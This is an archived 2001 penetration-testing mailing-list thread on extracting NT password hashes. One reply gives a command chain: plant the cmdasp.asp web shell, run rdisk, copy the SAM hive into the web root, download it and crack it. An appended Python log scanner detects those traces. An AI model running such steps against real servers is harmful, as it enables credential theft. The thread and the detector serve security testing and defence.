Re: Extracting NT password hashes from registry export file
From: Joe Brown (joe_brown@senet-int.com)
Date: 11/02/01
Message-ID: <000401c163e0$12138da0$3c05a8c0@senetelite>
From: "Joe Brown" <joe_brown@senet-int.com>
To: <pmawson@deloitte.co.nz>, <pen-test@securityfocus.com>
Subject: Re: Extracting NT password hashes from registry export file
Date: Fri, 2 Nov 2001 15:50:56 -0500
The problem I've come across with this is that since the IUSR_machinename
account is the anonymous web user, I don't have permissions to copy
c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam._
Any ideas???
Joe
----- Original Message -----
From: <pmawson@deloitte.co.nz>
To: <pen-test@securityfocus.com>
Sent: Wednesday, October 31, 2001 4:23 PM
Subject: RE: Extracting NT password hashes from registry export file
> David
>
> One problem you have is even administrator doesn't have access to the sam
> and security hives in the registry.
> Only the system account has access to these.
> As a result it is unlikely that the registry export contains these hives.
> There may be passwords cached in other areas, I don't know, someone else may
> be able to answer that one.
>
> If you can run regedit /e then you should be able to run
> echo "I am the first line of cmdasp.asp" >>cmdasp.asp
>
> Use this technique to get cmdasp.asp up to the server.
>
> You can then use cmdasp.asp to run rdisk /s- (back up the registry to the
> repair directory)
> Run copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam._
> Use your browser to download the file http://www.taget.com/sam._
> Run it through lophtcrack and you're done.
>
>
> Phill
>
>
> -----Original Message-----
> From: David Watson [mailto:david.watson@ioko365.com]
> Sent: Thursday, 1 November 2001 4:59 a.m.
> To: pen-test@securityfocus.com
> Subject: Extracting NT password hashes from registry export file
>
>
> Hi,
>
> Hopefully someone will have come across this problem before and will be
> able to offer some advice to save me some unnecessary pain. I'm trying to
> find a method to quickly and easily extract the NT password hashes from a
> registry export text file (ie regedit /e reg.txt) of a Win2K server.
>
> I have no file upload capability to the server in question, so I cannot use
> interactive methods such as pwdump/samdump to export the NT password hashes
> from memory (or pwdump3 with DLL injection for syskey protected hashes).
> However, I have been able to export a copy of registry as local
> administrator and download this data locally. Short of opening the ASCII
> export in a hex editor, locating the correct password hash starting off-set
> location in [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4] and
> manually extracting the first 16 bytes for the LMHash and the next 16 bytes
> for the NTHash from the "V"=hex: record for each account (which will be
> skeyed on further obfuscated via DES encryption with the user's RID as the
> key I believe), I can't find any tool or current technique to do this more
> easily.
>
> Has anyone ever tried to do this before, or come across/written a tool
> capable of reading an entire export file and extracting all the necessary
> data? Is there a better way to approach this problem that I might have
> missed? The source code for pwdump has a method to handle the
> de-obfuscation of the hashes but I'm surprised that I cannot find any
> previous papers or tools that attempt this process.
>
> As an aside, in the past on NT4 I would have updated the Windows repair
> directory using rdisk and extracted the hashes from the SAM. This only
> appears to be possible now in Win2K and above when using the GUI as command
> line rdisk support was apparently dropped recently (MS Q231777). Has anyone
> found a method of refreshing the repair directory from the command line
> in Win2K yet?
>
> Any advice appreciated, I'm happy to summarise my findings and post them
> here for others.
>
> Thanks,
>
> David
>
>
>
> --
> David Watson Voice: +44 1904 438000
> Technical Manager Fax: +44 1904 435450
> ioko365 Email: david.watson@ioko365.com
>
>
> --------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please see:
> https://alerts.securityfocus.com/
>
> ************************************************************
> CAUTION: This e-mail and any attachment(s) contains
> information that is both confidential and possibly legally
> privileged. No reader may make any use of its content
> unless that use is approved by Deloitte separately in writing.
> Any opinion, advice or information contained in this e-mail
> and any attachment(s) is to be treated as interim and
> provisional only and for the strictly limited purpose of the
> recipient as communicated to us. Neither the recipient nor
> any other person should act upon it without our separate
> written authorisation of reliance.
> If you have received this message in error please notify us
> immediately and destroy this message. Thank you.
> Deloitte Touche Tohmatsu
> Internet: www.deloitte.co.nz
> ************************************************************
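Seen from the server owner's side, the chain discussed in this thread (an .asp page written into the web root, rdisk refreshing the repair directory, sam._ copied under wwwroot and fetched with a browser) leaves two plain traces in the IIS access log: requests for an .asp page the site never deployed, and requests for repair-directory file names from the web root. The example below is added here and is not code from any poster in the thread. It scans IIS W3C extended log lines for both traces; the log lines are constructed for the example, and the allowlist of sanctioned .asp pages is a hypothetical site inventory a defender would substitute with their own. The permission that stopped Joe (the anonymous IUSR account having no write access to wwwroot) is the matching preventive control, and this check is the detective one.

```python
from dataclasses import dataclass

# Constructed IIS 5 W3C extended log excerpt (not a real capture).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-11-02 20:50:56
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-11-02 20:51:02 192.168.5.60 GET /default.asp - 200
2001-11-02 20:51:09 192.168.5.60 GET /images/logo.gif - 200
2001-11-02 20:52:31 192.168.5.60 POST /scripts/cmdasp.asp - 200
2001-11-02 20:52:40 192.168.5.60 GET /cmdasp.asp cmd=dir 200
2001-11-02 20:53:15 192.168.5.60 GET /sam._ - 200
2001-11-02 20:53:20 192.168.5.60 GET /sam._ - 404
2001-11-02 20:54:01 10.0.0.7 GET /search.asp q=test 200
"""

# Hypothetical inventory of .asp pages this site is known to serve.
KNOWN_ASP_PAGES = {"/default.asp", "/search.asp"}

# Compressed hive names rdisk writes into %SystemRoot%\repair. None of them
# belongs under a web root, so any request for one is worth an alert.
REPAIR_ARTIFACTS = {"sam._", "security._", "system._", "software._"}


@dataclass
class Finding:
    when: str
    client: str
    uri: str
    status: int
    reason: str


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue  # directives, or data before any #Fields header
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than mis-assign columns
        yield dict(zip(fields, values))


def scan_iis_log(text, known_asp=KNOWN_ASP_PAGES):
    """Flag repair-directory artifacts and unknown .asp pages in an IIS log."""
    allow = {p.lower() for p in known_asp}
    findings = []
    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"]
        basename = stem.rsplit("/", 1)[-1].lower()
        status = int(rec["sc-status"])
        when = f'{rec["date"]} {rec["time"]}'
        if basename in REPAIR_ARTIFACTS:
            findings.append(Finding(when, rec["c-ip"], stem, status,
                "repair-directory artifact requested from the web root"))
        elif basename.endswith(".asp") and stem.lower() not in allow:
            findings.append(Finding(when, rec["c-ip"], stem, status,
                ".asp page not in the site allowlist"))
    return findings


def successful_hive_downloads(findings):
    """Subset of findings where a hive artifact was actually served (2xx)."""
    return [f for f in findings
            if f.reason.startswith("repair-directory") and 200 <= f.status < 300]


if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f"{f.when} {f.client} {f.uri} {f.status}: {f.reason}")
    print("hives served:", len(successful_hive_downloads(scan_iis_log(SAMPLE_LOG))))
```

A 404 for sam._ is still reported, since the attempt itself is the signal; the `successful_hive_downloads` helper separates attempts from cases where the hive left the box and the local password hashes must be treated as disclosed.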